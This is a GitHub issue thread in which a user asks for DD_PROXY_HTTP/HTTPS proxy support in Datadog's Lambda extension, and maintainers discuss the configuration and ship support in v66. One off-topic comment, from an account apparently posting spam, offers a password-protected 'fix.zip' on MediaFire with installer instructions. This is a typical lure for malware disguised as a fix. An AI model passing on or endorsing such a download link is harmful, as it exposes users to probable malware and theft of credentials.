### ISSUE TITLE
DD_HTTP_PROXY for Optimized Datadog Lambda Extension 

### ISSUE THREAD

**Issue by jozolr** [DataDog/datadog-lambda-extension#378]
Hello,

It looks like that currently the DD_HTTP_PROXY and DD_HTTPS_PROXY variables are not implemented and fallback to the current version of the extension. Is it plan to add it ?

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by astuyve** [comment]
Hey @jozolr - thanks for reaching out!

It's on our list of priorities as we examine which features we need to support to move to GA. I'll leave this ticket open until we add support.

Thanks again!
AJ

**Comment by astuyve** [comment]
Hi @jozolr - in reading/experimenting it seems like `DD_HTTPS_PROXY` and `DD_HTTP_PROXY` are only used for requests made from the agent for things like our HTTP checks/healthchecks

In Lambda (as far as I can tell with our main agent) only support `HTTPS_PROXY`. Is that in line with your expectation? Are you relying on `DD_HTTPS_PROXY` for something other than proxying data to datadog from a function within a private subnet in a VPC?

Thanks!

**Comment by jozolr** [comment]
Hello @astuyve, we are only relying on DD_HTTPS_PROXY to proxy data to datadog currently, we also use HTTPS_PROXY but for other usages

**Comment by astuyve** [comment]
Hi @jozolr - I see, thanks for that. I think in Lambda we generally prefer `HTTPS_PROXY` which is used globally ([docs](https://docs.datadoghq.com/agent/configuration/proxy/?tab=linux#environment-variables)), because the libraries we're using already support that.

Unless there's a use case where you'd require a separate proxy? Could you share your config and general use case?

Thanks!
AJ

**Comment by astuyve** [comment]
Also - is there a chance we're conflating/confusing something? (Probably on my end!) From the docs, I don't believe `DD_HTTP_PROXY` is used by us at all, instead it's rather `DD_PROXY_HTTPS`:
![Image](https://github.com/user-attachments/assets/a7eac61b-12c3-427f-b480-14415d950064)

I quickly tested it with our main agent (not next-gen) in Lambda and wasn't able to make it work. If you could share the names of these environment variables in your setup that would be most helpful. It may make sense to communicate via email: aj@datadoghq.com is fine for me if you'd link.

Thanks!
AJ

**Comment by jozolr** [comment]
You right it's a typo from my part, i'm actually talking about DD_PROXY_HTTP and DD_PROXY_HTTPS

**Comment by astuyve** [comment]
Right gotchya, but are they set to different proxies? What happens if you remove DD_PROXY_HTTPS? I'm just trying to understand your specific use case and dimensionality of the config levels here, and hoping to maybe simplify things for Lambda.

Thanks!

**Comment by jozolr** [comment]
If I remove it the agent is not able to connect and send the traces to Datadog. I dont want to use HTTPS_PROXY because there are internal calls that shouldnt use the proxy.

**Comment by astuyve** [comment]
Thanks @jozolr that's helpful, I was looking for a shortcut which didn't exist. We'll be sure to honor your config in the next release!

**Comment by duncanista** [comment]
Hey @jozolr,

AJ is in OOO, so I'm giving you an update in his place. This should be available in the latest `v66` release. Feel free to try it out and let me know if you have any issues!

I'll close this for now, but feel free to re-open!
